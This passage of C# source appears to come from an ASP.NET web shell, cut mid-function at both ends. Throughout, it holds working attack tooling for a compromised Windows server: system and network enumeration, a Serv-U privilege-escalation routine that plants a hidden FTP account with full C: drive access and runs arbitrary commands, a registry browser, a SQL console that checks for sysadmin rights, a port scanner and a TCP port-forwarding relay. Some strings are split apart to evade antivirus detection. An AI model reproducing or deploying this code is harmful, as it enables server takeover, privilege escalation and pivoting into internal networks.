1041. TableCell td1=new TableCell();
1042. td1.Text=user.Rows[i][j].ToString();
1043. tr.Controls.Add(td1);
1044. VPa.Controls.Add(tr);
1045. }
1046. TableRow trn=new TableRow();
1047. for(int x=1;x<3;x++)
1048. {
1049. TableCell tdn=new TableCell();
1050. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1051. trn.Controls.Add(tdn);
1052. VPa.Controls.Add(trn);
1053. }
1054. }
1055. }
1056. catch(Exception error)
1057. {
1058. PLd();
1059. }
1060. }
1061. public void pDVM()
1062. {
1063. try
1064. {
1065. RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
1066. string IKjwH=DdmPl(EeZ,"PortNumber");
1067. RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
1068. int cpu=izN.SubKeyCount;
1069. RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
1070. string NPPZ=DdmPl(mQII,"ProcessorNameString");
1071. WICxe();
1072. ghaB.Visible=true;
1073. Bin_H2_Title.InnerText="System Information >>";
1074. Bin_H2_Mac.InnerText="MAC Information >>";
1075. Bin_H2_Driver.InnerText="Driver Information >>";
1076. StringBuilder yEwc=new StringBuilder();
1077. StringBuilder hwJeS=new StringBuilder();
1078. StringBuilder jXkaE=new StringBuilder();
1079. yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
1080. yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
1081. yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
1082. yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
1083. yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
1084. yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
1085. yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
1086. yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
1087. DataTable BIOS=cCf("Win32_BIOS");
1088. yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
1089. yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
1090. yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
1091. DataTable upM=cCf("Win32_PhysicalMemory");
1092. Int64 oZnZV=0;
1093. for(int i=0;i<upM.Rows.Count;i++)
1094. {
1095. oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
1096. }
1097. yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
1098. DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
1099. for(int i=0;i<dOza.Rows.Count;i++)
1100. {
1101. hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
1102. if(dOza.Rows[i]["MACAddress"]!=string.Empty)
1103. {
1104. hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
1105. }
1106. }
1107. DataTable Driver=cCf("Win32_SystemDriver");
1108. for (int i=0; i<Driver.Rows.Count; i++)
1109. {
1110. jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
1111. if (Driver.Rows[i]["PathName"]!=string.Empty)
1112. {
1113. jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
1114. }
1115. else
1116. {
1117. jXkaE.Append("No path information");
1118. }
1119. jXkaE.Append("</li>");
1120. }
1121. Bin_Ul_Sys.InnerHtml=yEwc.ToString();
1122. Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
1123. Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
1124. }
1125. catch(Exception error)
1126. {
1127. xseuB(error.Message);
1128. }
1129. }
1130. public void ADCpk()
1131. {
1132. WICxe();
1133. APl.Visible=true;
1134. Bin_H2_Title.InnerText="Serv-U Exec >>";
1135. }
1136. public void lDODR()
1137. {
1138. string JGGg=string.Empty;
1139. string user=dNohJ.Value;
1140. string pass=NMd.Value;
1141. int port=Int32.Parse(HlQl.Value);
1142. string cmd=mHbjB.Value;
1143. string CRtK="user "+user+"\r\n";
1144. string jnNG="pass "+pass+"\r\n";
1145. string site="SITE MAINTENANCE\r\n";
1146. string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
1147. string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
1148. string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
1149. string zexn="QUIT\r\n";
1150. UHlA.Visible=true;
1151. try
1152. {
1153. tcp.Connect("127.0.0.1",port);
1154. tcp.ReceiveBufferSize=1024;
1155. NS=tcp.GetStream();
1156. Rev(NS);
1157. ZJiM(NS,CRtK);
1158. Rev(NS);
1159. ZJiM(NS,jnNG);
1160. Rev(NS);
1161. ZJiM(NS,site);
1162. Rev(NS);
1163. ZJiM(NS,mtoJb);
1164. Rev(NS);
1165. ZJiM(NS,sutI);
1166. Rev(NS);
1167. ZJiM(NS,iVDT);
1168. Rev(NS);
1169. Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
1170. zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
1171. NS1=zvxm.GetStream();
1172. Rev(NS1);
1173. ZJiM(NS1,"user bin\r\n");
1174. Rev(NS1);
1175. ZJiM(NS1,"pass binftp\r\n");
1176. Rev(NS1);
1177. ZJiM(NS1,"site exec "+cmd+"\r\n");
1178. Rev(NS1);
1179. ZJiM(NS1,"quit\r\n");
1180. Rev(NS1);
1181. zvxm.Close();
1182. ZJiM(NS,mtoJb);
1183. Rev(NS);
1184. tcp.Close();
1185. }
1186. catch(Exception error)
1187. {
1188. xseuB(error.Message);
1189. }
1190. }
1191. protected void Rev(NetworkStream instream)
1192. {
1193. string FTBtf=string.Empty;
1194. if(instream.CanRead)
1195. {
1196. byte[] uPZ=new byte[1024];
1197. do
1198. {
1199. System.Threading.Thread.Sleep(50);
1200. int len=instream.Read(uPZ,0,uPZ.Length);
1201. FTBtf+=Encoding.Default.GetString(uPZ,0,len);
1202. }
1203. while(instream.DataAvailable);
1204. }
1205. Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
1206. }
1207. protected void ZJiM(NetworkStream instream,string Sendstr)
1208. {
1209. if(instream.CanWrite)
1210. {
1211. byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
1212. instream.Write(uPZ,0,uPZ.Length);
1213. }
1214. Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
1215. }
1216. public void xFhz()
1217. {
1218. WICxe();
1219. kkHN.Visible=true;
1220. Bin_H2_Title.InnerText="RegShell >>";
1221. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1222. vyX.Text="";
1223. foreach(string rootkey in txc.Split('|'))
1224. {
1225. vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
1226. }
1227. lFAvw();
1228. }
1229. protected void lFAvw()
1230. {
1231. qPdI.Text="";
1232. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
1233. TableRow tr;
1234. TableCell tc;
1235. foreach(string rootkey in txc.Split('|'))
1236. {
1237. tr=new TableRow();
1238. tc=new TableCell();
1239. string bg=OKM();
1240. tr.Attributes["onmouseover"]="this.className='focus';";
1241. tr.CssClass=bg;
1242. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1243. tc.Width=Unit.Parse("40%");
1244. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
1245. tr.Cells.Add(tc);
1246. tc=new TableCell();
1247. tc.Width=Unit.Parse("60%");
1248. tc.Text="&lt;RootKey&gt;";
1249. tr.Cells.Add(tc);
1250. pLWD.Rows.Add(tr);
1251. }
1252. }
1253. protected void tpRQ(string Reg_Path)
1254. {
1255. if(!Reg_Path.EndsWith("\\"))
1256. {
1257. Reg_Path=Reg_Path+"\\";
1258. }
1259. qPdI.Text=Reg_Path;
1260. string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
1261. cJG=Regex.Replace(cJG,@"\\+","\\");
1262. TableRow tr=new TableRow();
1263. TableCell tc=new TableCell();
1264. string bg=OKM();
1265. tr.Attributes["onmouseover"]="this.className='focus';";
1266. tr.CssClass=bg;
1267. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1268. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
1269. tc.Attributes["colspan"]="2" ;
1270. tr.Cells.Add(tc);
1271. pLWD.Rows.Add(tr);
1272. try
1273. {
1274. string subpath;
1275. string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
1276. RegistryKey rk=null;
1277. RegistryKey sk;
1278. if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
1279. {
1280. rk=Registry.LocalMachine;
1281. }
1282. else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
1283. {
1284. rk=Registry.ClassesRoot;
1285. }
1286. else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
1287. {
1288. rk=Registry.CurrentUser;
1289. }
1290. else if(Reg_Path.StartsWith("HKEY_USERS"))
1291. {
1292. rk=Registry.Users;
1293. }
1294. else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
1295. {
1296. rk=Registry.CurrentConfig;
1297. }
1298. if(kDgkX.Length>1)
1299. {
1300. sk=rk.OpenSubKey(kDgkX);
1301. }
1302. else
1303. {
1304. sk=rk;
1305. }
1306. foreach(string innerSubKey in sk.GetSubKeyNames())
1307. {
1308. tr=new TableRow();
1309. tc=new TableCell();
1310. bg=OKM();
1311. tr.Attributes["onmouseover"]="this.className='focus';";
1312. tr.CssClass=bg;
1313. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1314. tc.Width=Unit.Parse("40%");
1315. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
1316. tr.Cells.Add(tc);
1317. tc=new TableCell();
1318. tc.Width=Unit.Parse("60%");
1319. tc.Text="&lt;SubKey&gt;";
1320. tr.Cells.Add(tc);
1321. pLWD.Rows.Add(tr);
1322. }
1323. TableRow cKVA=new TableRow();
1324. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
1325. cKVA.Attributes["bgcolor"]="#dddddd";
1326. TableCell JlmW=new TableCell();
1327. JlmW.Attributes["colspan"]="2" ;
1328. JlmW.Attributes["height"]="5";
1329. cKVA.Cells.Add(JlmW);
1330. pLWD.Rows.Add(cKVA);
1331. foreach(string strValueName in sk.GetValueNames())
1332. {
1333. tr=new TableRow();
1334. tc=new TableCell();
1335. bg=OKM();
1336. tr.Attributes["onmouseover"]="this.className='focus';";
1337. tr.CssClass=bg;
1338. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1339. tc.Width=Unit.Parse("40%");
1340. tc.Text=strValueName;
1341. tr.Cells.Add(tc);
1342. tc=new TableCell();
1343. tc.Width=Unit.Parse("60%");
1344. tc.Text=DdmPl(sk,strValueName);
1345. tr.Cells.Add(tc);
1346. pLWD.Rows.Add(tr);
1347. }
1348. }
1349. catch(Exception error)
1350. {
1351. xseuB(error.Message);
1352. }
1353. }
1354. public string DdmPl(RegistryKey sk,string strValueName)
1355. {
1356. object uPZ;
1357. string RaTGr="";
1358. try
1359. {
1360. uPZ=sk.GetValue(strValueName,"NULL");
1361. if(uPZ.GetType()==typeof(byte[]))
1362. {
1363. foreach(byte tmpbyte in(byte[])uPZ)
1364. {
1365. if((int)tmpbyte<16)
1366. {
1367. RaTGr+="0";
1368. }
1369. RaTGr+=tmpbyte.ToString("X");
1370. }
1371. }
1372. else if(uPZ.GetType()==typeof(string[]))
1373. {
1374. foreach(string tmpstr in(string[])uPZ)
1375. {
1376. RaTGr+=tmpstr;
1377. }
1378. }
1379. else
1380. {
1381. RaTGr=uPZ.ToString();
1382. }
1383. }
1384. catch(Exception error)
1385. {
1386. xseuB(error.Message);
1387. }
1388. return RaTGr;
1389. }
1390. public void vNCHZ()
1391. {
1392. WICxe();
1393. YwLB.Visible=true;
1394. Bin_H2_Title.InnerText="PortScan >>";
1395. }
1396. public void rAhe()
1397. {
1398. WICxe();
1399. iDgmL.Visible=true;
1400. dQIIF.Visible=false;
1401. Bin_H2_Title.InnerText="DataBase >>";
1402. }
1403. protected void OUj()
1404. {
1405. if(Dtdr.State==ConnectionState.Closed)
1406. {
1407. try
1408. {
1409. Dtdr.ConnectionString=MasR.Text;
1410. Kkvb.Connection=Dtdr;
1411. Dtdr.Open();
1412. }
1413. catch(Exception Error)
1414. {
1415. xseuB(Error.Message);
1416. }
1417. }
1418. }
1419. protected void fUzE()
1420. {
1421. if(Dtdr.State==ConnectionState.Open)
1422. Dtdr.Close();
1423. Dtdr.Dispose();
1424. Kkvb.Dispose();
1425. }
1426. public DataTable CYUe(string sqlstr)
1427. {
1428. OleDbDataAdapter da=new OleDbDataAdapter();
1429. DataTable Dstog=new DataTable();
1430. try
1431. {
1432. OUj();
1433. Kkvb.CommandType=CommandType.Text;
1434. Kkvb.CommandText=sqlstr;
1435. da.SelectCommand=Kkvb;
1436. da.Fill(Dstog);
1437. }
1438. catch(Exception)
1439. {
1440. }
1441. finally
1442. {
1443. fUzE();
1444. }
1445. return Dstog;
1446. }
1447. public DataTable[] Bin_Data(string query)
1448. {
1449. ArrayList list=new ArrayList();
1450. try
1451. {
1452. string str;
1453. OUj();
1454. query=query+"\r\n";
1455. MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
1456. int EmRX=0;
1457. for(int i=0;i<gcod.Count;i++)
1458. {
1459. Match FJD=gcod[i];
1460. str=query.Substring(EmRX,FJD.Index-EmRX);
1461. if(str.Trim().Length>0)
1462. {
1463. OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
1464. Kkvb.CommandType=CommandType.Text;
1465. Kkvb.CommandText=str.Trim();
1466. FgzeQ.SelectCommand=Kkvb;
1467. DataSet cDPp=new DataSet();
1468. FgzeQ.Fill(cDPp);
1469. for(int j=0;j<cDPp.Tables.Count;j++)
1470. {
1471. list.Add(cDPp.Tables[j]);
1472. }
1473. }
1474. EmRX=FJD.Index+3;
1475. }
1476. str=query.Substring(EmRX,query.Length-EmRX);
1477. if(str.Trim().Length>0)
1478. {
1479. OleDbDataAdapter VwB=new OleDbDataAdapter();
1480. Kkvb.CommandType=CommandType.Text;
1481. Kkvb.CommandText=str.Trim();
1482. VwB.SelectCommand=Kkvb;
1483. DataSet arG=new DataSet();
1484. VwB.Fill(arG);
1485. for(int k=0;k<arG.Tables.Count;k++)
1486. {
1487. list.Add(arG.Tables[k]);
1488. }
1489. }
1490. }
1491. catch(SqlException e)
1492. {
1493. xseuB(e.Message);
1494. rom.Visible=false;
1495. }
1496. return(DataTable[])list.ToArray(typeof(DataTable));
1497. }
1498. public void JIAKU(string instr)
1499. {
1500. try
1501. {
1502. OUj();
1503. Kkvb.CommandType=CommandType.Text;
1504. Kkvb.CommandText=instr;
1505. Kkvb.ExecuteNonQuery();
1506. }
1507. catch(Exception e)
1508. {
1509. xseuB(e.Message);
1510. }
1511. }
1512. public void dwgT()
1513. {
1514. try
1515. {
1516. OUj();
1517. if(WYmo.SelectedItem.Text=="MSSQL")
1518. {
1519. if(Pvf.SelectedItem.Value!="")
1520. {
1521. Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
1522. }
1523. }
1524. DataTable[] jxF=null;
1525. jxF=Bin_Data(jHIy.InnerText);
1526. if(jxF!=null && jxF.Length>0)
1527. {
1528. for(int j=0;j<jxF.Length;j++)
1529. {
1530. rom.PreRender+=new EventHandler(lRavM);
1531. rom.DataSource=jxF[j];
1532. rom.DataBind();
1533. for(int i=0;i<rom.Items.Count;i++)
1534. {
1535. string bg=OKM();
1536. rom.Items[i].CssClass=bg;
1537. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1538. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1539. }
1540. }
1541. }
1542. else
1543. {
1544. rom.DataSource=null;
1545. rom.DataBind();
1546. }
1547. rom.Visible=true;
1548. }
1549. catch(Exception e)
1550. {
1551. xseuB(e.Message);
1552. rom.Visible=false;
1553. }
1554. }
1555. public void xTZY()
1556. {
1557. try
1558. {
1559. if(WYmo.SelectedItem.Text=="MSSQL")
1560. {
1561. if(Pvf.SelectedItem.Value=="")
1562. {
1563. rom.DataSource=null;
1564. rom.DataBind();
1565. return;
1566. }
1567. }
1568. OUj();
1569. DataTable zKvOw=new DataTable();
1570. DataTable jxF=new DataTable();
1571. DataTable baVJV=new DataTable();
1572. if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
1573. {
1574. Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
1575. }
1576. zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
1577. jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
1578. foreach(DataRow dr in zKvOw.Rows)
1579. {
1580. jxF.ImportRow(dr);
1581. }
1582. jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
1583. rom.PreRender+=new EventHandler(lRavM);
1584. rom.DataSource=jxF;
1585. rom.DataBind();
1586. for(int i=0;i<rom.Items.Count;i++)
1587. {
1588. string bg=OKM();
1589. rom.Items[i].CssClass=bg;
1590. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
1591. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
1592. }
1593. rom.Visible=true;
1594. }
1595. catch(Exception e)
1596. {
1597. xseuB(e.Message);
1598. rom.Visible=false;
1599. }
1600. }
1601. private void lRavM(object sender,EventArgs e)
1602. {
1603. DataGrid d=(DataGrid)sender;
1604. foreach(DataGridItem item in d.Items)
1605. {
1606. foreach(TableCell t in item.Cells)
1607. {
1608. t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
1609. }
1610. }
1611. }
1612. public void vCf()
1613. {
1614. dQIIF.Visible=true;
1615. try
1616. {
1617. jHIy.InnerHtml=string.Empty;
1618. if(WYmo.SelectedItem.Text=="MSSQL")
1619. {
1620. rom.Visible=false;
1621. uXevN.Visible=true;
1622. irTU.Visible=true;
1623. OUj();
1624. DataTable ver=CYUe(@"SELECT @@VERSION");
1625. DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
1626. DataTable cdb=CYUe(@"SELECT DB_NAME()");
1627. DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
1628. DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
1629. string jHlh=ver.Rows[0][0].ToString();
1630. string dbo=string.Empty;
1631. if(YKrm.Rows[0][0].ToString()=="1")
1632. {
1633. dbo="db_owner";
1634. }
1635. else
1636. {
1637. dbo="public";
1638. }
1639. if(rol.Rows[0][0].ToString()=="1")
1640. {
1641. dbo="<font color=blue>sa</font>";
1642. }
1643. string db_name=string.Empty;
1644. foreach(ListItem item in FGEy.Items)
1645. {
1646. if(item.Selected=true)
1647. {
1648. item.Selected=false;
1649. }
1650. }
1651. Pvf.Items.Clear();
1652. Pvf.Items.Add("-- Select a DataBase --");
1653. Pvf.Items[0].Value="";
1654. for(int i=0;i<dbs.Rows.Count;i++)
1655. {
1656. db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
1657. Pvf.Items.Add(dbs.Rows[i][0].ToString());
1658. }
1659. irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
1660. }
1661. else
1662. {
1663. uXevN.Visible=false;
1664. irTU.Visible=false;
1665. xTZY();
1666. }
1667. }
1668. catch(Exception e)
1669. {
1670. dQIIF.Visible=false;
1671. }
1672. }
1673. public void MHLv()
1674. {
1675. WICxe();
1676. hOWTm.Visible=true;
1677. string miansha1="P"+"o"+"r"+"t"+"M"+"a"+"p"+" "+">"+">";
1678. Bin_H2_Title.InnerText=miansha1;
1679. }
1680. public class PortForward
1681. {
1682. public string Localaddress;
1683. public int LocalPort;
1684. public string RemoteAddress;
1685. public int RemotePort;
1686. string type;
1687. Socket ltcpClient;
1688. Socket rtcpClient;
1689. Socket server;
1690. byte[] DPrPL=new byte[2048];
1691. byte[] wvZv=new byte[2048];
1692. public struct session
1693. {
1694. public Socket rdel;
1695. public Socket ldel;
1696. public int llen;
1697. public int rlen;
1698. }
1699. public static IPEndPoint mtJ(string host,int port)
1700. {
1701. IPEndPoint iep=null;
1702. IPHostEntry aGN=Dns.Resolve(host);
1703. IPAddress rmt=aGN.AddressList[0];
1704. iep=new IPEndPoint(rmt,port);
1705. return iep;
1706. }
1707. public void Start(string Rip,int Rport,string lip,int lport)
1708. {
1709. try
1710. {
1711. LocalPort=lport;
1712. RemoteAddress=Rip;
1713. RemotePort=Rport;
1714. Localaddress=lip;
1715. rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1716. ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
1717. rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
1718. }
1719. catch (Exception ex) { }
1720. }
1721. protected void iiGFO(IAsyncResult ar)
1722. {
1723. try
1724. {
1725. session RKXy=new session();
1726. RKXy.ldel=ltcpClient;
1727. RKXy.rdel=rtcpClient;
1728. ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
1729. }
1730. catch (Exception ex) { }
1731. }
1732. protected void VTp(IAsyncResult ar)
1733. {
1734. try
1735. {
1736. session RKXy=(session)ar.AsyncState;
1737. ltcpClient.EndConnect(ar);
1738. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
1739. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
1740. }
1741. catch (Exception ex) { }
1742. }
1743. private void LFYM(IAsyncResult ar)
1744. {
1745. try
1746. {
1747. session RKXy=(session)ar.AsyncState;
1748. int Ret=RKXy.rdel.EndReceive(ar);
1749. if (Ret>0)
1750. ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
1751. else lyTOK();
1752. }
1753. catch (Exception ex) { }
1754. }
1755. private void JTcp(IAsyncResult ar)
1756. {
1757. try
1758. {
1759. session RKXy=(session)ar.AsyncState;
1760. RKXy.ldel.EndSend(ar);
1761. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
1762. }
1763. catch (Exception ex) { }
1764. }
1765. private void xPS(IAsyncResult ar)
1766. {
1767. try
1768. {
1769. session RKXy=(session)ar.AsyncState;
1770. int Ret=RKXy.ldel.EndReceive(ar);
1771. if (Ret>0)
1772. RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
1773. else lyTOK();
1774. }
1775. catch (Exception ex) { }
1776. }
1777. private void IZU(IAsyncResult ar)
1778. {
1779. try
1780. {
1781. session RKXy=(session)ar.AsyncState;
1782. RKXy.rdel.EndSend(ar);
1783. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
1784. }
1785. catch (Exception ex) { }
1786. }
1787. public void lyTOK()
1788. {
1789. try
1790. {
1791. if (ltcpClient!=null)
1792. {
1793. ltcpClient.Close();
1794. }
1795. if (rtcpClient!=null)
1796. rtcpClient.Close();
1797. }
1798. catch (Exception ex) { }
1799. }
1800. }
1801. protected void vuou()
1802. {
1803. PortForward gYP=new PortForward();
1804. gYP.lyTOK();
1805. }
1806. protected void ruQO()
1807. {
1808. PortForward gYP=new PortForward();
1809. gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
1810. }
1811. public string mRDl(string instr)
1812. {
1813. string tmp=null;
1814. try
1815. {
1816. tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
1817. }
1818. catch(Exception e)
1819. {
1820. }
1821. return tmp;
1822. }
1823. public void VikG()
1824. {
1825. string[] OTV=lOmX.Text.ToString().Split(',');
1826. for(int i=0;i<OTV.Length;i++)
1827. {
1828. IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
1829. }
1830. try
1831. {
1832. Thread[] kbXY=new Thread[IVc.Count];
1833. int sdO=0;
1834. for(sdO=0;sdO<IVc.Count;sdO++)
1835. {
1836. kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
1837. kbXY[sdO].Start();
1838. }
1839. for(sdO=0;sdO<kbXY.Length;sdO++)
1840. kbXY[sdO].Join();
1841. }
1842. catch
1843. {
1844. }
1845. }
1846. public class ScanPort
1847. {
1848. private string _ip="";
1849. private int jTdO=0;
1850. private TimeSpan _timeSpent;
1851. private string QGcH="Not scanned";
1852. public string ip
1853. {
1854. get { return _ip;}
1855. }
1856. public int port
1857. {
1858. get { return jTdO;}
1859. }
1860. public string status
1861. {
1862. get { return QGcH;}
1863. }
1864. public TimeSpan timeSpent
1865. {
1866. get { return _timeSpent;}
1867. }
1868. public ScanPort(string ip,int port)
1869. {
1870. _ip=ip;
1871. jTdO=port;
1872. }
1873. public void Scan()
1874. {
1875. TcpClient iYap=new TcpClient();
1876. DateTime qYZT=DateTime.Now;
1877. try
1878. {
1879. iYap.Connect(_ip,jTdO);
1880. iYap.Close();
1881. QGcH="<font color=green><b>Open</b></font>";
1882. }
1883. catch
1884. {
1885. QGcH="<font color=red><b>Close</b></font>";
1886. }
1887. _timeSpent=DateTime.Now.Subtract(qYZT);
1888. }
1889. }
1890. public static void YFcNP(System.Web.UI.Page page)
1891. {
1892. page.RegisterHiddenField("__EVENTTARGET","");
1893. page.RegisterHiddenField("__FILE","");
1894. string s=@"<script language=Javascript>";
1895. s+=@"function Bin_PostBack(eventTarget,eventArgument)";
1896. s+=@"{";
1897. s+=@"var theform=document.forms[0];";
1898. s+=@"theform.__EVENTTARGET.value=eventTarget;";
1899. s+=@"theform.__FILE.value=eventArgument;";
1900. s+=@"theform.submit();";
1901. s+=@"} ";
1902. s+=@"</scr"+"ipt>";
1903. page.RegisterStartupScript("",s);
1904. }
1905. protected void PPtK(object sender,EventArgs e)
1906. {
1907. WICxe();
1908. yhv.Visible=true;
1909. Bin_H2_Title.InnerText="File Search >>";
1910. NaLJ.Value=Request.PhysicalApplicationPath;
1911. oJiym.Visible=false;
1912. }
1913. protected void NBy(object sender,EventArgs e)
1914. {
1915. DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
1916. if(!GQMM.Exists)
1917. {
1918. xseuB("Path invalid ! ");
1919. return;
1920. }
1921. oog(GQMM);
1922. xseuB("Search completed ! ");
1923. }
1924. public void oog(DirectoryInfo dir)
1925. {
1926. try
1927. {
1928. oJiym.Visible=true;
1929. foreach(FileInfo Bin_Files in dir.GetFiles())
1930. {
1931. try
1932. {
1933. if(Bin_Files.FullName==Request.PhysicalPath)
1934. {
1935. continue;
1936. }
1937. if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
1938. {
1939. continue;
1940. }
1941. if(Ven.SelectedItem.Value=="name")
1942. {
1943. if(rAQ.Checked)
1944. {
